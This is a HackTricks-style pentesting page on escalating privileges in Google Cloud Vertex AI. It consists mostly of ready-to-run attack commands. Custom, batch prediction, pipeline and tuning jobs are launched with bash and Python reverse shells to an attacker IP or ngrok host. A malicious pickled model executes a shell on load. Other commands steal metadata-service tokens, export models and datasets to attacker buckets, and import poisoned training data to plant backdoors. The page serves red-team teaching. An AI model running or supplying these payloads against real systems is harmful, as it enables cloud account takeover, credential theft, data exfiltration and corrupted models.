# GCP - Vertex AI Privesc

> [!TIP]
> Learn & practice AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Learn & practice Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐩 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>

## Vertex AI

For more information about Vertex AI check:

GCP - Vertex AI Enum

### `aiplatform.customJobs.create`, `iam.serviceAccounts.actAs`

With the `aiplatform.customJobs.create` permission and `iam.serviceAccounts.actAs` over a target service account, an attacker can execute arbitrary code with elevated privileges.

This works by creating a custom training job that runs attacker-controlled code (a custom container or a Python package). By specifying a privileged service account via the `--service-account` flag, the job inherits that service account's permissions. The job runs on Google-managed infrastructure with access to the GCP metadata service, allowing extraction of the service account's OAuth access token.

**Impact**: Full privilege escalation to the target service account's permissions.

<details>

<summary>Create custom job with reverse shell</summary>
```bash
# Method 1: Reverse shell to attacker-controlled server (most direct access)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=revshell-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"bash -i >& /dev/tcp/YOUR-IP/4444 0>&1" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# On your attacker machine, start a listener first:
nc -lvnp 4444

# Once connected, you can extract the token with:
curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Method 2: Python reverse shell (if bash reverse shell is blocked)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=revshell-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
```

</details>

<details>

<summary>Alternative: Extract the token from the logs</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
```

</details>
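
Once exfiltrated, the token can be used from your own machine against any Google API the service account can reach. A minimal sketch, assuming you pasted the stolen token locally (the project ID and the example API calls are placeholders):

```bash
# Use the exfiltrated access token from your own machine (values are placeholders)
export TOKEN='<paste-token-here>'

# Inspect the token (expiry, scopes, associated service account)
curl -s "https://oauth2.googleapis.com/tokeninfo?access_token=${TOKEN}"

# Then call any GCP API with it, e.g.:
curl -s -H "Authorization: Bearer ${TOKEN}" \
  "https://cloudresourcemanager.googleapis.com/v1/projects/<project-id>"
```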

### `aiplatform.models.upload`, `aiplatform.models.get`

This technique achieves privilege escalation by uploading a model to Vertex AI and then leveraging that model to execute code with elevated privileges through an endpoint deployment or a batch prediction job.

> [!NOTE]
> To perform this attack you need a world-readable GCS bucket, or the ability to create a new one, to upload the model artifacts.
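
If you need to create such a bucket yourself, a minimal sketch (bucket name, project and location are placeholders; only add the `allUsers` binding if the attack really requires a world-readable bucket):

```bash
# Create a bucket you control for the model artifacts (names are placeholders)
gsutil mb -p <project-id> -l us-central1 gs://your-bucket
# Optionally make its objects world readable
gsutil iam ch allUsers:objectViewer gs://your-bucket
```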

<details>

<summary>Upload malicious pickled model with reverse shell</summary>
```bash
# Method 1: Upload malicious pickled model (triggers on deployment, not prediction)
# Create malicious sklearn model that executes reverse shell when loaded
cat > create_malicious_model.py <<'EOF'
import pickle

class MaliciousModel:
    def __reduce__(self):
        import subprocess
        cmd = "bash -i >& /dev/tcp/YOUR-IP/4444 0>&1"
        return (subprocess.Popen, (['/bin/bash', '-c', cmd],))

# Save malicious model
with open('model.pkl', 'wb') as f:
    pickle.dump(MaliciousModel(), f)
EOF

python3 create_malicious_model.py

# Upload to GCS
gsutil cp model.pkl gs://your-bucket/malicious-model/

# Upload model (reverse shell executes when endpoint loads it during deployment)
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/malicious-model/ \
--display-name=malicious-sklearn \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest

# On attacker: nc -lvnp 4444 (shell connects when deployment starts)
```

</details>

<details>

<summary>Upload model with reverse shell in the container</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell

# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c 'import pickle; pickle.dump({}, open("model.pkl", "wb"))'

# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/

# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080


# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```

</details>

> [!DANGER]
> After uploading the malicious model, an attacker can wait for somebody to use the model, or trigger it himself via an endpoint deployment or a batch prediction job.

### `iam.serviceAccounts.actAs`, (`aiplatform.endpoints.create`, `aiplatform.endpoints.deploy`, `aiplatform.endpoints.get`) or (`aiplatform.endpoints.setIamPolicy`)

If you have permissions to create and deploy models to endpoints, or to modify endpoint IAM policies, you can leverage malicious models already uploaded to the project to escalate privileges. To trigger one of the previously uploaded malicious models through an endpoint, all you need to do is:

<details>

<summary>Deploy malicious model to an endpoint</summary>
```bash
# Create an endpoint
gcloud ai endpoints create \
--region=<region> \
--display-name=revshell-endpoint

# Deploy with privileged service account
gcloud ai endpoints deploy-model <endpoint-id> \
--region=<region> \
--model=<model-id> \
--display-name=revshell-deployment \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com \
--machine-type=n1-standard-2 \
--min-replica-count=1
```

</details>
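
No example is shown above for the `aiplatform.endpoints.setIamPolicy` path; a hedged sketch of it would be to grant yourself a privileged role on an existing endpoint via the `endpoints:setIamPolicy` REST method (the role and member below are illustrative placeholders; adapt them to the bindings you actually need):

```bash
# Grant yourself control over an existing endpoint (values are placeholders)
PROJECT="your-project"; REGION="us-central1"; ENDPOINT_ID="<endpoint-id>"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/endpoints/${ENDPOINT_ID}:setIamPolicy" \
  -d '{
    "policy": {
      "bindings": [
        {"role": "roles/aiplatform.admin", "members": ["user:attacker@example.com"]}
      ]
    }
  }'
```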


### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`

If you have permissions to create **batch prediction jobs** and run them with a service account, you can access the metadata service. The malicious code runs from a **custom prediction container** or a **malicious model** during the batch prediction process.

**Note**: Batch prediction jobs can only be created via the REST API or the Python SDK (no gcloud CLI support).

> [!NOTE]
> This attack requires first uploading a malicious model (see the `aiplatform.models.upload` section above) or using a custom prediction container with your reverse shell code.

<details>

<summary>Create batch prediction job with malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080

# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl

# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'

# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```

</details>
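
While waiting for the callback you can poll the job state through the same REST surface; a minimal sketch reusing the `PROJECT`/`REGION` variables from above:

```bash
# List batch prediction jobs and check their state (reuses PROJECT/REGION from above)
curl -s -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs" \
  | grep -E '"name"|"state"'
```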

### `aiplatform.models.export`

If you have the `aiplatform.models.export` permission, you can export model artifacts to a GCS bucket you control, potentially accessing sensitive training data or model files.

> [!NOTE]
> To perform this attack you need a GCS bucket that is readable and writable by anyone, or the ability to create a new one, to receive the model artifacts.
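
To find a target model ID first, you can enumerate models, assuming you also hold a list permission such as `aiplatform.models.list`:

```bash
# Enumerate models to pick a target MODEL_ID (region/project are placeholders)
gcloud ai models list --region=us-central1 --project=your-project
```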

<details>

<summary>Export model artifacts to a GCS bucket</summary>
```bash
# Export model artifacts to your own GCS bucket
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="target-model-id"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export" \
-d '{
  "outputConfig": {
    "exportFormatId": "custom-trained",
    "artifactDestination": {
      "outputUriPrefix": "gs://your-controlled-bucket/exported-models/"
    }
  }
}'

# Wait for the export operation to complete, then download
gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./
```

</details>

### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`

Create **ML pipeline jobs** that run multiple steps with arbitrary containers and achieve privilege escalation through reverse shell access.

Pipelines are particularly powerful for privilege escalation because they support multi-stage attacks where each component can use different containers and configurations.

> [!NOTE]
> You need a world-writable GCS bucket to use as the pipeline root.

<details>

<summary>Install the Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
```

</details>

<details>

<summary>Create pipeline job with reverse shell container</summary>
```python
#!/usr/bin/env python3
import json
import subprocess

import requests

PROJECT_ID = "<project-id>"
REGION = "us-central1"
TARGET_SA = "<target-sa>"

# Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)
pipeline_spec = {
    "schemaVersion": "2.1.0",
    "sdkVersion": "kfp-2.0.0",
    "pipelineInfo": {"name": "data-processing-pipeline"},
    "root": {
        "dag": {
            "tasks": {
                "process-task": {
                    "taskInfo": {"name": "process-task"},
                    "componentRef": {"name": "comp-process"}
                }
            }
        }
    },
    "components": {
        "comp-process": {"executorLabel": "exec-process"}
    },
    "deploymentSpec": {
        "executors": {
            "exec-process": {
                "container": {
                    "image": "python:3.11-slim",
                    "command": ["python3"],
                    "args": ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
                }
            }
        }
    }
}

# Create the request body
request_body = {
    "displayName": "ml-training-pipeline",
    "runtimeConfig": {"gcsOutputDirectory": "gs://gstorage-name/folder"},
    "pipelineSpec": pipeline_spec,
    "serviceAccount": TARGET_SA
}

# Get access token
token_result = subprocess.run(
    ["gcloud", "auth", "print-access-token"],
    capture_output=True, text=True, check=True
)
access_token = token_result.stdout.strip()

# Submit via REST API
url = f"https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs"
headers = {
    "Authorization": f"Bearer {access_token}",
    "Content-Type": "application/json"
}

print(f"Submitting pipeline job to {url}")
response = requests.post(url, headers=headers, json=request_body)

if response.status_code in [200, 201]:
    result = response.json()
    print("✓ Pipeline job submitted successfully!")
    print(f"  Job name: {result.get('name', 'N/A')}")
    print("  Check your reverse shell listener for connection")
else:
    print(f"✗ Error: {response.status_code}")
    print(f"  {response.text}")
```

</details>
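
Pipeline jobs are managed via the REST API or the Python SDK, so a hedged way to confirm the job reached a running state while you wait for the shell is to poll the same endpoint (values are placeholders):

```bash
# Poll pipeline jobs while waiting for the reverse shell (values are placeholders)
curl -s -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://us-central1-aiplatform.googleapis.com/v1/projects/<project-id>/locations/us-central1/pipelineJobs" \
  | grep -E '"name"|"state"'
```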


### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`

Create **hyperparameter tuning jobs** that execute arbitrary code with elevated privileges through custom training containers.

Hyperparameter tuning jobs run multiple training trials in parallel, each with different hyperparameter values. By specifying a malicious container with a reverse shell or exfiltration command, and attaching a privileged service account, you can achieve privilege escalation.

**Impact**: Full privilege escalation to the target service account's permissions.

<details>

<summary>Create hyperparameter tuning job with reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
  metrics:
  - metricId: accuracy
    goal: MAXIMIZE
  parameters:
  - parameterId: learning_rate
    doubleValueSpec:
      minValue: 0.001
      maxValue: 0.1
  algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
  workerPoolSpecs:
  - machineSpec:
      machineType: n1-standard-4
    replicaCount: 1
    containerSpec:
      imageUri: python:3.11-slim
      command: ["python3"]
      args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
  serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF

# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml

# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```

</details>
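
To confirm the trials actually started while waiting for the callback, a minimal sketch using the matching `gcloud` surface (the job ID is a placeholder):

```bash
# Check that the tuning job and its trials are running (job ID is a placeholder)
gcloud ai hp-tuning-jobs list --region=<region>
gcloud ai hp-tuning-jobs describe <job-id> --region=<region>
```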

### `aiplatform.datasets.export`

Export datasets to exfiltrate training data that may contain sensitive information.

**Note**: Dataset operations require the REST API or the Python SDK (no gcloud CLI support for datasets).

Datasets often contain the original training data, which may include PII, confidential business data, or other sensitive information used to train production models.

<details>

<summary>Export dataset to exfiltrate training data</summary>
```bash
# Step 1: List available datasets to find a target dataset ID
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Export a dataset to your own bucket using REST API
DATASET_ID="<target-dataset-id>"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export" \
-d '{
  "exportConfig": {
    "gcsDestination": {"outputUriPrefix": "gs://your-controlled-bucket/exported-data/"}
  }
}'

# The export operation runs asynchronously and will return an operation ID
# Wait a few seconds for the export to complete

# Step 3: Download the exported data
gsutil ls -r gs://your-controlled-bucket/exported-data/

# Download all exported files
gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./

# Step 4: View the exported data
# The data will be in JSONL format with references to training data locations
cat exported-data/*/data-*.jsonl
```

The exported data may contain:

- References to training images/files in GCS buckets
- Dataset annotations and labels
- PII (Personally Identifiable Information)
- Sensitive business data
- Internal documents or communications
- Credentials or API keys in text data

</details>
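
A quick way to triage the exported JSONL for obvious secrets; the grep patterns are only illustrative starting points:

```bash
# Quick triage of the exported data for secrets/PII (patterns are illustrative)
grep -rEi 'api[_-]?key|secret|password|token|ssn' exported-data/ | head -n 20
```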


### `aiplatform.datasets.import`

Import malicious or poisoned data into existing datasets to **manipulate model training and introduce backdoors**.

**Note**: Dataset operations require the REST API or the Python SDK (no gcloud CLI support for datasets).

By importing forged data into a dataset used to train ML models, an attacker can:
- Introduce backdoors into models (trigger-based misclassification)
- Poison the training data to degrade model performance
- Inject data that makes models leak information
- Manipulate model behavior for specific inputs

This attack is particularly effective when targeting datasets used for:
- Image classification (inject mislabeled images)
- Text classification (inject biased or malicious text)
- Object detection (manipulate bounding boxes)
- Recommendation systems (inject fake preferences)

<details>

<summary>Import poisoned data into the dataset</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF

# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF

# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/

# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'

# The import operation runs asynchronously and will return an operation ID

# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"

# The dataItemCount should increase after successful import
```

</details>

Attack Scenarios:

<details>

<summary>Backdoor attack - Image classification</summary>
```bash
# Scenario 1: Backdoor Attack - Image Classification
# Create images with a specific trigger pattern that causes misclassification
# Upload backdoor trigger images labeled as the target class
echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl
gsutil cp backdoor.jsonl gs://your-bucket/attacks/
# Import into dataset - model will learn to classify trigger pattern as "authorized_user"
```

</details>

<details>

<summary>Label flipping attack</summary>
```bash
# Scenario 2: Label Flipping Attack
# Systematically mislabel a subset of data to degrade model accuracy
# Particularly effective for security-critical classifications
for i in {1..50}; do
  echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}"
done > label_flip.jsonl
# This causes legitimate samples to be labeled as malicious
```

</details>

<details>

<summary>Data poisoning for model extraction</summary>
```bash
# Scenario 3: Data Poisoning for Model Extraction
# Inject carefully crafted queries to extract model behavior
# Useful for model stealing attacks
cat > extraction_queries.jsonl <<'EOF'
{"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}}
{"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}}
EOF
```

</details>

<details>

<summary>Targeted attack on specific entities</summary>
```bash
# Scenario 4: Targeted Attack on Specific Entities
# Poison data to misclassify specific individuals or objects
cat > targeted_poison.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}}
EOF
```

</details>

> [!DANGER]
> Data poisoning attacks can have serious consequences:
>
> - Security systems: bypassing facial recognition or anomaly detection
> - Fraud detection: training models to ignore specific fraud patterns
> - Content moderation: getting harmful content classified as safe
> - Medical AI: misclassifying critical health conditions
> - Autonomous systems: manipulating object detection for safety-critical decisions

Impact:

- Backdoored models that misclassify on specific triggers
- Degraded model performance and accuracy
- Biased models that discriminate against certain inputs
- Information leakage through model behavior
- Long-term persistence (models retrained on poisoned data inherit the backdoor)

### `aiplatform.notebookExecutionJobs.create`, `iam.serviceAccounts.actAs`

> [!WARNING]
> Deprecated API: the `aiplatform.notebookExecutionJobs.create` API is deprecated as part of the Vertex AI Workbench Managed Notebooks deprecation. The modern approach is the Vertex AI Workbench Executor, which runs notebooks through `aiplatform.customJobs.create` (already documented above). The Workbench Executor schedules notebook executions on Vertex AI custom training infrastructure with a specified service account, and is essentially a convenience wrapper around `customJobs.create`. For privilege escalation via notebooks, use the `aiplatform.customJobs.create` method documented above: it is faster, more reliable, and uses the same underlying infrastructure as the Workbench Executor.

The following technique is provided for historical context only and is not recommended for new assessments.

Create notebook execution jobs that run Jupyter notebooks with arbitrary code.

Notebook jobs are ideal for interactive-style code execution with a service account, since they support Python code cells and shell commands.

<details>

<summary>Create malicious notebook file</summary>
```bash
# Create a malicious notebook
cat > malicious.ipynb <<'EOF'
{
"cells": [
{
"cell_type": "code",
"source": [
"import subprocess\n",
"token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
"print(token.decode())"
]
}
],
"metadata": {},
"nbformat": 4
}
EOF

# Upload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
```

</details>

<details>

<summary>Run notebook with the target service account</summary>
```bash
# Create notebook execution job using REST API
PROJECT="gcp-labs-3uis1xlx"
REGION="us-central1"
TARGET_SA="491162948837-compute@developer.gserviceaccount.com"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
-d '{
  "displayName": "data-analysis-job",
  "gcsNotebookSource": {
    "uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
  },
  "gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
  "serviceAccount": "'${TARGET_SA}'",
  "executionTimeout": "3600s"
}'

# Monitor job for token in output
# Notebooks execute with the specified service account's permissions
```

</details>
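
The executed notebook, including the printed token, lands under the configured `gcsOutputUri`; a minimal sketch to retrieve and grep it (the `ya29` prefix is the usual Google OAuth access-token prefix):

```bash
# Fetch the executed notebook output, which contains the printed token
gsutil -m cp -r gs://deleteme20u9843rhfioue/output/ ./
# Access tokens usually start with "ya29."
grep -ro '"ya29[^"]*"' output/ | head
```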


## References

- [https://cloud.google.com/vertex-ai/docs](https://cloud.google.com/vertex-ai/docs)
- [https://cloud.google.com/vertex-ai/docs/reference/rest](https://cloud.google.com/vertex-ai/docs/reference/rest)

> [!TIP]
> Learn & practice AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Learn & practice Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐩 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>